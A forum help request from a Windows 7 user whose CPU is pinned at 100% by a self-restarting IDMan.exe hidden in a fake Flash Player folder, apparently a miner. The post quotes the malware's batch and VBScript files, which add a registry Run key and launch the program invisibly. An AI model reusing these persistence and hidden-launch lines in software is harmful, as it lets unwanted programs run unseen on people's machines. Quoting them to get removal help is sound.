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Everything posted by altwark

  1. Windows 7 Ultimate. Problem: CP usage 100% Culprit: IDMan.exe I performed a scan with Malwarebytes. Many PUPs were found and deleted. I performed the scan multiple times to make shure there were no PUP files left. I systematically ended processes in the Taks Manager one by one to find the culprit. When ending the process IDMan.exe the CPU usage instantly drops to 0%. But afterwards the process is running again and my PC overheats and freezes. The IDMan.exe resides in User/AppData/Roaming/Flash Player/SpeedCache The following 5 files reside in this folder: 1. idm.bat @echo off %windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v IDM /d "wscript \"%appdata%\Adobe\Flash Player\SpeedCache\idm.vbs\" \"%appdata%\Adobe\Flash Player\SpeedCache\idm.bat\"" /f start /b /normal "a" "%appdata%\Adobe\Flash Player\SpeedCache\IDMan.exe" 2. idm.vbs CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 3. IDMan.exe 4. libcurl.dll 5. pthreadGC2.dll It's not possible to remove IDMan.exe from the Control panel/Programs and Features/ Uninstall because it is not listed. I deleted the 5 files manually and whenever I restart the PC an error message pops up saying Windows Script Host can't be found. When I put the files back into the Flash Player Speedcache folder and restart the PC the error message isn't there but the problem with 100% CP usage recurs. Some help would be much appreciated. Thanks.
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